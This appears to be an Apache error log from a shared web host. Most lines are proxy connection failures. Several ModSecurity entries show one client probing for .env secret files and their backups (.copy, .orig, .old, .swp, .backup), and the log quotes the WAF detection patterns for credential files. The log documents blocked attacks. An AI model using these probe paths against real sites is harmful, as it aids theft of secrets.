[Tue May 26 17:11:30.503455 2026] [proxy_http:error] [pid 860158:tid 860410] [client 208.84.100.188:1858] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:30.504067 2026] [proxy:error] [pid 860158:tid 860410] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:30.504099 2026] [proxy_http:error] [pid 860158:tid 860410] [client 208.84.100.188:1858] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:31.105702 2026] [proxy:error] [pid 860158:tid 860342] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:31.105783 2026] [proxy_http:error] [pid 860158:tid 860342] [client 208.84.100.188:2086] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:31.105929 2026] [proxy:error] [pid 860158:tid 860332] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:31.105996 2026] [proxy_http:error] [pid 860158:tid 860332] [client 208.84.100.188:2074] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:31.106395 2026] [proxy:error] [pid 860158:tid 860342] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:31.106430 2026] [proxy_http:error] [pid 860158:tid 860342] [client 208.84.100.188:2086] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:31.106607 2026] [proxy:error] [pid 860158:tid 860332] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:31.106669 2026] [proxy_http:error] [pid 860158:tid 860332] [client 208.84.100.188:2074] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:31.110222 2026] [proxy:error] [pid 860158:tid 860362] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:31.110265 2026] [proxy_http:error] [pid 860158:tid 860362] [client 208.84.100.188:2076] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:31.110843 2026] [proxy:error] [pid 860158:tid 860362] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:31.110877 2026] [proxy_http:error] [pid 860158:tid 860362] [client 208.84.100.188:2076] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:31.303339 2026] [proxy:error] [pid 860158:tid 860312] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:31.303428 2026] [proxy_http:error] [pid 860158:tid 860312] [client 208.84.100.188:2102] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:31.304061 2026] [proxy:error] [pid 860158:tid 860312] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:31.304115 2026] [proxy_http:error] [pid 860158:tid 860312] [client 208.84.100.188:2102] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:31.312012 2026] [proxy:error] [pid 860158:tid 860321] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:31.312101 2026] [proxy_http:error] [pid 860158:tid 860321] [client 208.84.100.188:2072] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:31.312343 2026] [proxy:error] [pid 860158:tid 860356] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:31.312391 2026] [proxy_http:error] [pid 860158:tid 860356] [client 208.84.100.188:2066] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:31.312914 2026] [proxy:error] [pid 860158:tid 860321] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:31.312957 2026] [proxy_http:error] [pid 860158:tid 860321] [client 208.84.100.188:2072] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:31.313197 2026] [proxy:error] [pid 860158:tid 860356] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:31.313236 2026] [proxy_http:error] [pid 860158:tid 860356] [client 208.84.100.188:2066] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:31.314186 2026] [proxy:error] [pid 860158:tid 860294] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:31.314282 2026] [proxy_http:error] [pid 860158:tid 860294] [client 208.84.100.188:2050] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:31.314909 2026] [proxy:error] [pid 860158:tid 860294] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:31.314977 2026] [proxy_http:error] [pid 860158:tid 860294] [client 208.84.100.188:2050] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:31.315147 2026] [proxy:error] [pid 860158:tid 860356] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:31.315187 2026] [proxy_http:error] [pid 860158:tid 860356] [client 208.84.100.188:2054] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:31.315280 2026] [proxy:error] [pid 860158:tid 860343] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:31.315343 2026] [proxy_http:error] [pid 860158:tid 860343] [client 208.84.100.188:2016] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:31.315437 2026] [proxy:error] [pid 860158:tid 860403] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:31.315480 2026] [proxy_http:error] [pid 860158:tid 860403] [client 208.84.100.188:2008] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:31.315828 2026] [proxy:error] [pid 860158:tid 860356] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:31.315868 2026] [proxy_http:error] [pid 860158:tid 860356] [client 208.84.100.188:2054] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:31.315945 2026] [proxy:error] [pid 860158:tid 860343] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:31.315981 2026] [proxy_http:error] [pid 860158:tid 860343] [client 208.84.100.188:2016] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:31.316068 2026] [proxy:error] [pid 860158:tid 860403] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:31.316104 2026] [proxy_http:error] [pid 860158:tid 860403] [client 208.84.100.188:2008] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:31.316274 2026] [proxy:error] [pid 860158:tid 860355] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:31.316328 2026] [proxy_http:error] [pid 860158:tid 860355] [client 208.84.100.188:1968] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:31.316811 2026] [proxy:error] [pid 860158:tid 860413] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:31.316893 2026] [proxy_http:error] [pid 860158:tid 860413] [client 208.84.100.188:1936] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:31.317941 2026] [proxy:error] [pid 860158:tid 860355] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:31.317983 2026] [proxy_http:error] [pid 860158:tid 860355] [client 208.84.100.188:1968] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:31.318013 2026] [security2:error] [pid 860158:tid 860338] [client 208.84.100.188:1864] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcalendars.kexcouriers.com"] [uri "/___proxy_subdomain_cpcalendars/.env"] [unique_id "ahWG64YFlz_JJsUnscKuowAAALc"]
[Tue May 26 17:11:31.318081 2026] [security2:error] [pid 860158:tid 860404] [client 208.84.100.188:1898] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcalendars.kexcouriers.com"] [uri "/___proxy_subdomain_cpcalendars/app/.env"] [unique_id "ahWG64YFlz_JJsUnscKuoAAAAPk"]
[Tue May 26 17:11:31.318123 2026] [proxy:error] [pid 860158:tid 860374] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:31.318175 2026] [proxy_http:error] [pid 860158:tid 860374] [client 208.84.100.188:1896] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:31.318598 2026] [security2:error] [pid 860158:tid 860396] [client 208.84.100.188:1924] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcalendars.kexcouriers.com"] [uri "/___proxy_subdomain_cpcalendars/backend/.env"] [unique_id "ahWG64YFlz_JJsUnscKuogAAAPE"]
[Tue May 26 17:11:31.318639 2026] [proxy:error] [pid 860158:tid 860349] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:31.318680 2026] [proxy_http:error] [pid 860158:tid 860349] [client 208.84.100.188:1932] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:31.318884 2026] [proxy:error] [pid 860158:tid 860367] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:31.318930 2026] [proxy_http:error] [pid 860158:tid 860367] [client 208.84.100.188:1984] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:31.319104 2026] [proxy:error] [pid 860158:tid 860378] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:31.319173 2026] [proxy_http:error] [pid 860158:tid 860378] [client 208.84.100.188:1980] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:31.319344 2026] [proxy:error] [pid 860158:tid 860407] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:31.319387 2026] [proxy_http:error] [pid 860158:tid 860407] [client 208.84.100.188:1934] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:31.319484 2026] [proxy:error] [pid 860158:tid 860349] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:31.319526 2026] [proxy_http:error] [pid 860158:tid 860349] [client 208.84.100.188:1932] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:31.319841 2026] [proxy:error] [pid 860158:tid 860378] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:31.319881 2026] [proxy_http:error] [pid 860158:tid 860378] [client 208.84.100.188:1980] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:31.319948 2026] [security2:error] [pid 860158:tid 860350] [client 208.84.100.188:1912] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "cpcalendars.kexcouriers.com"] [uri "/___proxy_subdomain_cpcalendars/api/.env"] [unique_id "ahWG64YFlz_JJsUnscKulAAAAMM"]
[Tue May 26 17:11:31.320044 2026] [proxy:error] [pid 860158:tid 860360] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:31.320083 2026] [proxy_http:error] [pid 860158:tid 860360] [client 208.84.100.188:1880] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:31.320213 2026] [proxy:error] [pid 860158:tid 860302] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:31.320254 2026] [proxy_http:error] [pid 860158:tid 860302] [client 208.84.100.188:2034] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:31.320412 2026] [proxy:error] [pid 860158:tid 860385] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:31.320453 2026] [proxy_http:error] [pid 860158:tid 860385] [client 208.84.100.188:1970] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:31.320557 2026] [proxy:error] [pid 860158:tid 860407] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:31.320595 2026] [proxy_http:error] [pid 860158:tid 860407] [client 208.84.100.188:1934] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:31.320751 2026] [proxy:error] [pid 860158:tid 860354] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:31.320810 2026] [proxy_http:error] [pid 860158:tid 860354] [client 208.84.100.188:1996] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:31.321038 2026] [proxy:error] [pid 860158:tid 860385] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:31.321072 2026] [proxy_http:error] [pid 860158:tid 860385] [client 208.84.100.188:1970] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:31.321156 2026] [proxy:error] [pid 860158:tid 860392] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:31.321195 2026] [proxy_http:error] [pid 860158:tid 860392] [client 208.84.100.188:1958] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:31.321741 2026] [proxy:error] [pid 860158:tid 860354] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:31.321791 2026] [proxy_http:error] [pid 860158:tid 860354] [client 208.84.100.188:1996] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:31.321885 2026] [proxy:error] [pid 860158:tid 860360] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:31.321929 2026] [proxy_http:error] [pid 860158:tid 860360] [client 208.84.100.188:1880] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:31.322015 2026] [proxy:error] [pid 860158:tid 860302] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:31.322053 2026] [proxy_http:error] [pid 860158:tid 860302] [client 208.84.100.188:2034] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:31.322238 2026] [proxy:error] [pid 860158:tid 860365] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:31.322272 2026] [proxy_http:error] [pid 860158:tid 860365] [client 208.84.100.188:1992] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:31.322362 2026] [proxy:error] [pid 860158:tid 860367] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:31.322399 2026] [proxy_http:error] [pid 860158:tid 860367] [client 208.84.100.188:1984] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:31.322493 2026] [proxy:error] [pid 860158:tid 860392] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:31.322539 2026] [proxy_http:error] [pid 860158:tid 860392] [client 208.84.100.188:1958] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:31.322767 2026] [proxy:error] [pid 860158:tid 860374] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:31.322807 2026] [proxy_http:error] [pid 860158:tid 860374] [client 208.84.100.188:1896] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:31.324250 2026] [proxy:error] [pid 860158:tid 860401] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:31.324326 2026] [proxy_http:error] [pid 860158:tid 860401] [client 208.84.100.188:1952] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:31.324447 2026] [proxy:error] [pid 860158:tid 860413] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:31.324512 2026] [proxy_http:error] [pid 860158:tid 860413] [client 208.84.100.188:1936] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:31.324599 2026] [proxy:error] [pid 860158:tid 860365] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:31.324647 2026] [proxy_http:error] [pid 860158:tid 860365] [client 208.84.100.188:1992] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:31.324812 2026] [proxy:error] [pid 860158:tid 860386] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:31.324862 2026] [proxy_http:error] [pid 860158:tid 860386] [client 208.84.100.188:1942] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:31.325446 2026] [proxy:error] [pid 860158:tid 860401] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:31.325518 2026] [proxy_http:error] [pid 860158:tid 860401] [client 208.84.100.188:1952] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:31.325802 2026] [proxy:error] [pid 860158:tid 860288] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:31.325864 2026] [proxy_http:error] [pid 860158:tid 860288] [client 208.84.100.188:2022] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:31.325977 2026] [proxy:error] [pid 860158:tid 860386] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:31.326026 2026] [proxy_http:error] [pid 860158:tid 860386] [client 208.84.100.188:1942] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:31.326905 2026] [proxy:error] [pid 860158:tid 860288] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:31.326978 2026] [proxy_http:error] [pid 860158:tid 860288] [client 208.84.100.188:2022] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:32.616671 2026] [security2:error] [pid 860158:tid 860368] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWG7IYFlz_JJsUnscKuvQAAANU"]
[Tue May 26 17:11:32.703113 2026] [proxy:error] [pid 860158:tid 860294] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:32.703205 2026] [proxy_http:error] [pid 860158:tid 860294] [client 208.84.100.188:1864] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:32.703852 2026] [proxy:error] [pid 860158:tid 860294] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:32.703936 2026] [proxy_http:error] [pid 860158:tid 860294] [client 208.84.100.188:1864] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:34.063898 2026] [security2:error] [pid 860158:tid 860375] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWG7YYFlz_JJsUnscKu3AAAANw"]
[Tue May 26 17:11:35.613330 2026] [security2:error] [pid 860158:tid 860385] [client 208.84.100.188:1898] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "cpcalendars.kexcouriers.com"] [uri "/___proxy_subdomain_cpcalendars/.env.production.copy"] [unique_id "ahWG74YFlz_JJsUnscKvDgAAAOY"]
[Tue May 26 17:11:35.613452 2026] [proxy:error] [pid 860158:tid 860407] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:35.613525 2026] [proxy_http:error] [pid 860158:tid 860407] [client 208.84.100.188:1924] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:35.613702 2026] [proxy:error] [pid 860158:tid 860412] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:35.613783 2026] [proxy_http:error] [pid 860158:tid 860412] [client 208.84.100.188:1912] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:35.614254 2026] [proxy:error] [pid 860158:tid 860407] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:35.614306 2026] [proxy_http:error] [pid 860158:tid 860407] [client 208.84.100.188:1924] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:35.614394 2026] [proxy:error] [pid 860158:tid 860412] (111)Connection refused: AH00957: http: attempt to connect to 127.0.0.1:2079 (127.0.0.1:2079) failed
[Tue May 26 17:11:35.614428 2026] [proxy_http:error] [pid 860158:tid 860412] [client 208.84.100.188:1912] AH01114: HTTP: failed to make connection to backend: 127.0.0.1
[Tue May 26 17:11:36.620098 2026] [security2:error] [pid 860158:tid 860369] [client 203.194.101.7:62064] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWG8IYFlz_JJsUnscKvMAAAANY"]
[Tue May 26 17:11:36.620262 2026] [security2:error] [pid 860158:tid 860369] [client 203.194.101.7:62064] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWG8IYFlz_JJsUnscKvMAAAANY"]
[Tue May 26 17:11:36.909617 2026] [security2:error] [pid 860158:tid 860382] [client 208.84.100.188:2340] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "cpcalendars.kexcouriers.com"] [uri "/___proxy_subdomain_cpcalendars/.env.production.orig"] [unique_id "ahWG8IYFlz_JJsUnscKvNAAAAOM"]
[Tue May 26 17:11:36.911463 2026] [security2:error] [pid 860158:tid 860408] [client 208.84.100.188:2300] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "cpcalendars.kexcouriers.com"] [uri "/___proxy_subdomain_cpcalendars/.env.production.old"] [unique_id "ahWG8IYFlz_JJsUnscKvOAAAAP0"]
[Tue May 26 17:11:36.911662 2026] [security2:error] [pid 860158:tid 860314] [client 208.84.100.188:2332] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "cpcalendars.kexcouriers.com"] [uri "/___proxy_subdomain_cpcalendars/.env.production.swp"] [unique_id "ahWG8IYFlz_JJsUnscKvNwAAAJ8"]
[Tue May 26 17:11:36.911922 2026] [security2:error] [pid 860158:tid 860384] [client 208.84.100.188:2254] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "cpcalendars.kexcouriers.com"] [uri "/___proxy_subdomain_cpcalendars/.env.local~"] [unique_id "ahWG8IYFlz_JJsUnscKvPAAAAOU"]
[Tue May 26 17:11:36.912371 2026] [security2:error] [pid 860158:tid 860366] [client 208.84.100.188:2306] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "cpcalendars.kexcouriers.com"] [uri "/___proxy_subdomain_cpcalendars/.env.production.backup"] [unique_id "ahWG8IYFlz_JJsUnscKvOwAAANM"]
